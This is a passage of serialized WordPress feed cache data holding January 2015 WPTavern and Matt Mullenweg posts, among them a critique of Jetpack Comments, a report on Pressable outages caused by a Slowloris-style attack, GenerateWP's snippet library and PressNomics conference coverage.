Europe 2015 will include interpretation for the local language. While all sessions will be given in English, a Spanish translation will be offered simultaneously.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 20:37:32 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:17;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:93:\"WPTavern: Why Jetpack Comments is Not A Great Alternative to WordPress’ Native Comment Form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38091\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:100:\"http://wptavern.com/why-jetpack-comments-is-not-a-great-alternative-to-wordpress-native-comment-form\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:7500:\"<p>Jetpack ships with more than <a title=\"http://jetpack.me/\" href=\"http://jetpack.me/\">30 different modules </a>including, <a title=\"http://jetpack.me/support/comments/\" href=\"http://jetpack.me/support/comments/\">Jetpack Comments</a>. One of its primary features is allowing people to login using credentials from their WordPress.com, Twitter, Facebook, or Google+ accounts.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/JetpackCommentForm.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-38094\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/JetpackCommentForm.png?resize=499%2C374\" alt=\"Jetpack Comments Form\" /></a>Jetpack Comments Form\n<p>This module has replaced the WordPress native comment form for nearly two years on WP Tavern. It makes it easier for people on social networks to post a comment, but the convenience comes with several drawbacks.</p>\n<h2>Lack of a Graceful Fallback</h2>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/JetpackCommentsOutOfFuel.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-20439\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/04/JetpackCommentsOutOfFuel.png?resize=646%2C201\" alt=\"Jetpack Comments Temporarily Offline\" /></a>Out Of Fuel\n<p>In early 2014, <a title=\"http://wptavern.com/the-combination-of-jetpack-and-dreamhost-security-settings-lead-to-lost-comments\" href=\"http://wptavern.com/the-combination-of-jetpack-and-dreamhost-security-settings-lead-to-lost-comments\">several Tavern readers experienced</a> <strong>Service Temporarily Unavailable</strong> errors when trying to submit a comment. The error was caused by a security setting with <a title=\"http://www.modsecurity.org/\" href=\"http://www.modsecurity.org/\">mod_security</a> on DreamHost and exposed the lack of a graceful fallback. Instead of displaying an error, the iFrame should have been replaced with the native comment form. I <a title=\"https://github.com/Automattic/jetpack/issues/446\" href=\"https://github.com/Automattic/jetpack/issues/446\">created an issue</a> on Github explaining the problem and although it gained immediate attention, not much has happened since.</p>\n<h2>Annoying Page Refreshes</h2>\n<p>It&#8217;s normal for articles on the Tavern to have several comments with multi-threaded conversations. I&#8217;ve discovered that Jetpack Comments will sometimes take me to a different part of the page after I reply to a comment instead of taking me to where the comment is published. It doesn&#8217;t happen all the time, but when it does, it&#8217;s annoying.</p>\n<p>It&#8217;s 2015, 10 years after the term <a title=\"http://www.adaptivepath.com/ideas/ajax-new-approach-web-applications/\" href=\"http://www.adaptivepath.com/ideas/ajax-new-approach-web-applications/\">Ajax was coined by Jesse James Garrett</a>. Ajax stands for Asynchronous JavaScript + XML. It&#8217;s a collection of technologies that provide near real-time interaction with page elements. For example, if you leave a comment on a site running the <a title=\"http://p2theme.com/\" href=\"http://p2theme.com/\">P2 theme</a>, it will appear on the site without refreshing the page.</p>\n<p>Page refreshes are distracting, annoying, and break the flow of a conversation. I&#8217;m <a title=\"http://wordpress.org/support/topic/i-was-expected-some-other-fu?replies=2\" href=\"http://wordpress.org/support/topic/i-was-expected-some-other-fu?replies=2\">not the first one</a> to request Jetpack Comments be Ajaxified. In an <a title=\"https://github.com/Automattic/jetpack/issues/833#issuecomment-67605046\" href=\"https://github.com/Automattic/jetpack/issues/833#issuecomment-67605046\">issue on Jetpack&#8217;s Github account</a>, George Stephanis, who is a member of the Jetpack development team explains that, while theoretically possible, it&#8217;s not high on the priority list.</p>\n<blockquote><p>It&#8217;s theoretically possible passing the event through JS <code>window.postMessage</code> &#8212; but to actually render the comment would take some theme integration that we can&#8217;t presently assume. If someone wanted to write this I&#8217;d be fine accepting a pull request that fires an event and passes some limited data back, like the comment ID and status or something, but it&#8217;s not high on the priority list.</p></blockquote>\n<p>The ticket has gained little traction with no signs of Ajax support being added anytime soon. His response is similar to Matt Mullenweg&#8217;s in <a title=\"http://wptavern.com/wpweekly-episode-130-catching-up-with-matt-mullenweg\" href=\"http://wptavern.com/wpweekly-episode-130-catching-up-with-matt-mullenweg\">episode 130 of WordPress Weekly</a>, when I asked him <a title=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\" href=\"http://wptavern.com/what-is-the-future-of-comments-in-wordpress\">why comments haven&#8217;t changed much</a> in WordPress over the years, “It’s very difficult to iterate comments as it’s hard to get those changes to be compatible with every WordPress theme in the world.&#8221;</p>\n<h2>It&#8217;s Not Highly Extendable</h2>\n<p>One of the biggest problems I have with Jetpack Comments is that it&#8217;s not easily extendable using plugins. Since it&#8217;s an iFrame hosted on WordPress.com, it&#8217;s hard to manipulate and is an <strong>all or nothing </strong>approach.</p>\n<h2>The Old Comment Form</h2>\n<p>In 2011, I used <a title=\"http://wptavern.com/how-to-mimic-the-wptavern-commenting-system\" href=\"http://wptavern.com/how-to-mimic-the-wptavern-commenting-system\">a collection of plugins</a> to add features to the native comment form so it felt more like a reply box on a forum. Readers had the ability to style and preview comments without having to write code. They could also subscribe to the thread and edit their comment afterwards for up to 10 minutes.</p>\n<p>However, my favorite feature was the Reply link next to each comment. When clicked, the name along with a link to the comment id was automatically added to the comment form. For example, <strong>@&lt;a href=&#8221;#comment-11784&#8243; rel=&#8221;reply&#8221;&gt;Name of Awesome Commenter&lt;/a&gt; &#8211; Comment text here</strong>. Since the theme didn&#8217;t support threaded comments at the time, this feature came in handy.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/OldTavernCommentForm.png\" rel=\"prettyphoto[38091]\"><img class=\"size-full wp-image-38095\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/OldTavernCommentForm.png?resize=625%2C657\" alt=\"Comment Form Used on The Tavern in 2011\" /></a>Comment Form Used on The Tavern in 2011\n<p>Although some of the features are replicated in Jetpack Comments, the old form felt like a better experience to me. If you&#8217;re a long time commenter on the Tavern, I&#8217;m curious if you feel the same way?</p>\n<h2>I Don&#8217;t Recommend Jetpack Comments</h2>\n<p>In an era where Twitter, Facebook, etc. provide the ability for real-time communication, Jetpack Comments and the default comment system in WordPress feels like ancient technology. If all you need is an easy way for people to login using their social media accounts to post a comment, Jetpack Comments is a good solution. However, if you need something more robust, look elsewhere.</p>\n<p>Unless the team adds Ajax support for comment submissions and makes the module more extendable, I can&#8217;t recommend it as a viable alternative to the native comment form in WordPress.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Thu, 29 Jan 2015 18:54:11 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:18;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:68:\"WPTavern: Recent Pressable Outages the Result of a Slow Loris Attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=38064\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:78:\"http://wptavern.com/recent-pressable-outages-the-result-of-a-slow-loris-attack\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:3011:\"<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/slow-loris.jpg\" rel=\"prettyphoto[38064]\"><img src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2015/01/slow-loris.jpg?resize=700%2C346\" alt=\"photo credit: BBC Nature\" class=\"size-full wp-image-38071\" /></a>photo credit: <a href=\"http://www.bbc.co.uk/nature/life/Slow_loris\">BBC Nature</a>\n<p>Last week, <a href=\"https://pressable.com/\" target=\"_blank\">Pressable</a> was engaged in a 24/7 struggle to keep its customers&#8217; sites operational. The <a href=\"http://wptavern.com/pressable-struggles-to-retain-customers-following-recent-outages\" target=\"_blank\">recent outages</a> caused some customers 24+ hours of downtime and many closed their accounts in favor of finding an alternative host. Today the company announced that the root cause of the outage customers experienced the week of January 19, 2015, was an intentional attack on Pressable&#8217;s systems.</p>\n<p>A <a href=\"https://pressable.com/blog/2015/01/28/root-cause-analysis-outage-week-january-19-2015/\" target=\"_blank\">post</a> on the company&#8217;s blog further breaks down the attack: <strong>&#8220;Ultimately, the reason for this outage was a well crafted attack on our systems. The attack was a variant of the “<a href=\"http://en.wikipedia.org/wiki/Slowloris_%28software%29\" target=\"_blank\">Slow-Loris</a>” attack discovered in 2009.&#8221;</strong></p>\n<p>The attack went undetected because of the insidious manner in which it was executed. Pressable has been working with security professionals to get the attack under control and announced <a href=\"http://status.pressable.com/2015/01/24/all-systems-operational/\" target=\"_blank\">all systems operational</a> on Monday.</p>\n<p>A week ago, after hearing about Pressable&#8217;s continued struggle with downtime, I asked CEO Vid Luther if the company was being intentionally sabotaged. At the time, he didn&#8217;t think that an attack was a real possibility:</p>\n<blockquote><p>I do not believe that anyone who has an agenda against Pressable is behind these issues. I&#8217;m not aware of anyone who has an agenda against Pressable, besides the general competition in the WordPress hosting space, and currently, some of them are acting like vultures. But, I don&#8217;t think those guys have the ability to orchestrate something like this. So, unfortunately, no conspiracy theory from our side.</p></blockquote>\n<p>While working to mitigate customer downtime, the Pressable team discovered the coordinated attack on their systems. The attacker&#8217;s sophisticated method of sabotaging Pressable went undetected, because it was made to appear that the host&#8217;s infrastructure was being overloaded.</p>\n<p>The knowledge of the attack came after multiple apologies from Luther, who originally identified Pressable&#8217;s lagging infrastructure as the cause. Luther told the Tavern that he has an idea of who the attackers are but will be digging into it further before calling out any parties publicly.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 22:43:08 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:19;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:62:\"WPTavern: GenerateWP Introduces WordPress Custom Code Snippets\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37861\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:72:\"http://wptavern.com/generatewp-introduces-wordpress-custom-code-snippets\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:5357:\"<p><a href=\"http://generatewp.com/\" target=\"_blank\">GenerateWP</a>, the popular WordPress code generator site, is celebrating two years in operation this week. The site, founded by <a href=\"https://profiles.wordpress.org/ramiy\" target=\"_blank\">Rami Yushuvaev</a>, launched with five code generators and now has more than 20. Yushuvaev sees the site as an educational tool that helps WordPress developers learn more about coding best practices.</p>\n<p>Before launching GenerateWP, Yushuvaev created <a href=\"http://www.wp-tricks.co.il/generator/\" target=\"_blank\">three code generators</a> to serve the Israeli WordPress community. The site was an instant success, which prompted him to translate it into English and launch GenerateWP in January 2013.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-hebrew.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-hebrew.jpg?resize=727%2C221\" alt=\"generatewp-hebrew\" class=\"aligncenter size-full wp-image-38035\" /></a></p>\n<p>The first week after launching, Yushuvaev was approached by a major brand that offered to buy the site and a few developers made offers to finance more generators. &#8220;I decided that it wasn’t the right time to give up the site, since I had big plans for it and for the WordPress community,&#8221; he said.</p>\n<p>The site has 15K+ registered WordPress developers and averages 100,000 visitors per month, most of whom are designers and developers. During the past two years, Yushuvaev worked with contributors Maor Chasen and Ohad Raz to rewrite the entire code base to use object-oriented programming and make it work better with WordPress.</p>\n<p>In celebration of the site&#8217;s two year birthday, GenerateWP is introducing custom code snippets, which will allow users to save their own snippets in a public and/or private library. &#8220;Front-end designers use <a href=\"http://Codepen.io\" target=\"_blank\">codepen.io</a> to showcase their code, JavaScript developers use <a href=\"http://jsfiddle.net\" target=\"_blank\">jsfiddle.net</a>, Bootstrap developers have <a href=\"http://bootsnipp.com\" target=\"_blank\">bootsnipp.com</a>, and now WordPress developers have <a href=\"http://GenerateWP.com\" target=\"_blank\">GenerateWP.com</a>,&#8221; Yushuvaev said.</p>\n<p>The site now includes a collective <a href=\"http://generatewp.com/snippet/\" target=\"_blank\">library of public snippets</a> shared with the community. Users can also browse public snippets by author.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/rami-snippets.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/rami-snippets.jpg?resize=963%2C458\" alt=\"rami-snippets\" class=\"aligncenter size-full wp-image-38047\" /></a></p>\n<p>Individual <a href=\"http://generatewp.com/snippet/nvMganl/\" target=\"_blank\">snippets</a> allow users to share, download, or clone the code into their own libraries. Developers can embed snippets on their sites, send them to <a href=\"http://pastebin.com/\" target=\"_blank\">Pastebin</a>, or create a <a href=\"https://gist.github.com/\" target=\"_blank\">GitHub gist</a>.</p>\n<p><a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-snippets.jpg\" rel=\"prettyphoto[37861]\"><img src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/generatewp-snippets.jpg?resize=957%2C483\" alt=\"generatewp-snippets\" class=\"aligncenter size-full wp-image-38049\" /></a></p>\n<h3>Future Plans for Expanding GenerateWP</h3>\n<p>Yushuvaev has plans to monetize the site further down the road but said that the generators and code snippets will always remain free. &#8220;The money will come from other services,&#8221; he said. &#8220;I can&#8217;t reveal our plans but you can expect a game changing feature for our premium users.&#8221;</p>\n<p>In the meantime, the team plans to create new code generators, including a tool to generate widgets, a meta box generator, and admin menu page generators. In the coming weeks, the site will also provide an oEmbed option to embed snippets using nothing but the URL.</p>\n<p>Currently, the most popular generators on the site are the ones for creating custom post types, shortcodes, and custom taxonomies. Yushuvaev is optimistic that the site will continue to grow as more developers discover how much time they can save with the generators.</p>\n<p>I was writing the same code over and over again (post types and taxonomies) for different clients,&#8221; he said. &#8220;Creating an automatic generator to save some time was the next logical step.&#8221; He found that writing code eats up plenty of time and did not want to utilize free plugins, as they often do not remain in active development.</p>\n<p>GenerateWP is quickly becoming a popular tool for WordPress educators. &#8220;The site is used in WordPress classes around the world to teach new developers how to properly code using WordPress coding standards,&#8221; Yushuvaev said. &#8220;We managed to confirm a class in Thailand, universities and colleges in Israel, United States, Canada, and Germany.</p>\n<p>&#8220;We also have received requests to translate our tools to other languages,&#8221; he said. The GenerateWP team plans to add translations in the near future to open up the site to more international users.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 21:20:56 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Sarah Gooding\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:20;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:27:\"Matt: Slack Buys Screenhero\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:21:\"http://ma.tt/?p=44638\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:43:\"http://ma.tt/2015/01/slack-buys-screenhero/\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:534:\"<p><a href=\"http://techcrunch.com/2015/01/28/slack-buys-screenhero-to-add-screen-sharing-and-voice-chat-to-its-work-messaging-platform/\">Slack Buys Screenhero To Add Screen Sharing And Voice Chat To Its Work Messaging Platform</a>, which I&#8217;m very excited about as a daily user of Slack (on 5 teams now) and through <a href=\"http://audrey.co/\">Audrey</a> an investor in <a href=\"https://screenhero.com/\">Screenhero</a> and a big fan of their vision. As the article mentions, Automattic has been a Screenhero customer as well.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 19:47:17 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:4:\"Matt\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:21;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:40:\"WPTavern: Thank a Plugin Author Day 2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37980\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:50:\"http://wptavern.com/thank-a-plugin-author-day-2015\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:2579:\"<p><a title=\"https://wordpress.org/news/2009/01/thank-a-plugin-developer-day/\" href=\"https://wordpress.org/news/2009/01/thank-a-plugin-developer-day/\">Created by Matt Mullenweg in 2009,</a> when the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">plugin directory</a> hosted only 4K plugins, Thank a Plugin Author Day (January 28th) motivates users to thank plugin authors.</p>\n<p>There are several ways to celebrate the event, such as visiting the plugin author&#8217;s website. The link is usually available via the plugin&#8217;s page on WordPress.org. You can also find a link to the author&#8217;s website by searching for the plugin in the backend of WordPress. Also, most plugins in the directory have a link to give a monetary donation.</p>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/PluginDonationLink.png\" rel=\"prettyphoto[37980]\"><img class=\"size-full wp-image-38009\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/PluginDonationLink.png?resize=975%2C527\" alt=\"Plugin Donation Link\" /></a>Plugin Donation Link\n<p>Another way to thank plugin authors is to rate and review their plugins. Ratings and reviews are <a title=\"http://wptavern.com/rate-and-review-a-wordpress-plugin-day-set-for-october-17th\" href=\"http://wptavern.com/rate-and-review-a-wordpress-plugin-day-set-for-october-17th\">an easy way to send feedback</a> directly to an author. Make sure to provide actionable feedback instead of one or two-word reviews. A side effect of rating and reviewing plugins, is that it&#8217;s one of many ways to contribute back to the WordPress project.</p>\n<a href=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/11/BillionThanksFeaturedImage.png\" rel=\"prettyphoto[37980]\"><img class=\"size-full wp-image-34331\" src=\"http://i2.wp.com/wptavern.com/wp-content/uploads/2014/11/BillionThanksFeaturedImage.png?resize=796%2C267\" alt=\"Billion Thanks Featured Image\" /></a>photo credit: <a href=\"https://www.flickr.com/photos/opensourceway/7007768456/\">opensourceway</a> &#8211; <a href=\"http://creativecommons.org/licenses/by-sa/2.0/\">cc</a>\n<p>Since the holiday&#8217;s creation, over 31K plugins have been added to the directory which results in nearly 36K reasons to use WordPress! <strong>Thank you</strong> to anyone who has ever published a WordPress plugin whether it&#8217;s on the <a title=\"https://wordpress.org/plugins/\" href=\"https://wordpress.org/plugins/\">official directory</a> or on GitHub. Without so many plugins, I wouldn&#8217;t be able to customize WordPress to make it my own.</p>\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:7:\"pubDate\";a:1:{i:0;a:5:{s:4:\"data\";s:31:\"Wed, 28 Jan 2015 07:05:33 +0000\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}s:32:\"http://purl.org/dc/elements/1.1/\";a:1:{s:7:\"creator\";a:1:{i:0;a:5:{s:4:\"data\";s:13:\"Jeff Chandler\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}}}}i:22;a:6:{s:4:\"data\";s:13:\"\n	\n	\n	\n	\n	\n	\n\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";s:5:\"child\";a:2:{s:0:\"\";a:5:{s:5:\"title\";a:1:{i:0;a:5:{s:4:\"data\";s:79:\"WPTavern: Envato Stats, Tips For Getting Things Done, and More at PressNomics 3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"guid\";a:1:{i:0;a:5:{s:4:\"data\";s:28:\"http://wptavern.com/?p=37944\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:4:\"link\";a:1:{i:0;a:5:{s:4:\"data\";s:87:\"http://wptavern.com/envato-stats-tips-for-getting-things-done-and-more-at-pressnomics-3\";s:7:\"attribs\";a:0:{}s:8:\"xml_base\";s:0:\"\";s:17:\"xml_base_explicit\";b:0;s:8:\"xml_lang\";s:0:\"\";}}s:11:\"description\";a:1:{i:0;a:5:{s:4:\"data\";s:10754:\"<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/WelcomeToPressNomicsFeaturedImage.png\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37971\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/WelcomeToPressNomicsFeaturedImage.png?resize=671%2C288\" alt=\"PressNomics Introduction\" /></a>PressNomics Introduction\n<p>Last week, I attended the third annual <a title=\"http://pressnomics.com/\" href=\"http://pressnomics.com/\">PressNomics conference</a> in Phoenix, AZ. The event focuses on the business side of the WordPress ecosystem and provides opportunities for business owners to learn from those who are blazing a path towards success. On the evening before PressNomics, I joined several business owners for dinner.</p>\n<p>A half hour into the meal, I listened intently to various conversations taking place around the table. Topics of conversation included: market segments, customer satisfaction, and business partnerships. At this point I realized I was definitely at a business conference.</p>\n<h2>The Family Delivers Opening Remarks</h2>\n<p>Joshua and Sally Strebel along with their kids, appeared on stage and delivered the opening remarks. It&#8217;s as if the family invited every attendee into their home for a family reunion.</p>\n<blockquote class=\"twitter-tweet\" width=\"550\"><p><a href=\"https://twitter.com/hashtag/PressNomics?src=hash\">#PressNomics</a> is getting started! <a href=\"http://t.co/DqFGdEidK4\">pic.twitter.com/DqFGdEidK4</a></p>\n<p>&mdash; Brian Krogsgard (@Krogsgard) <a href=\"https://twitter.com/Krogsgard/status/558295522725752833\">January 22, 2015</a></p></blockquote>\n<p></p>\n<p>Despite several competing businesses, companies, and products under one roof, I witnessed so many small groups of people discussing strategy as if they&#8217;re all friends. I felt a positive energy amongst the crowd and several attendees left the event in high spirits, ready to take their businesses to the next level.</p>\n<h2>Session Highlights</h2>\n<a href=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/30-Medium.jpg\" rel=\"prettyphoto[37944]\"><img class=\"size-full wp-image-37973\" src=\"http://i0.wp.com/wptavern.com/wp-content/uploads/2015/01/30-Medium.jpg?resize=1024%2C768\" alt=\"A Room Full of Knowledge Seekers\" /></a>Name the people in this image\n<p>The room was packed with attendees for every session since PressNomics chose not to record or live stream the event. The following is a list of memorable points from the sessions 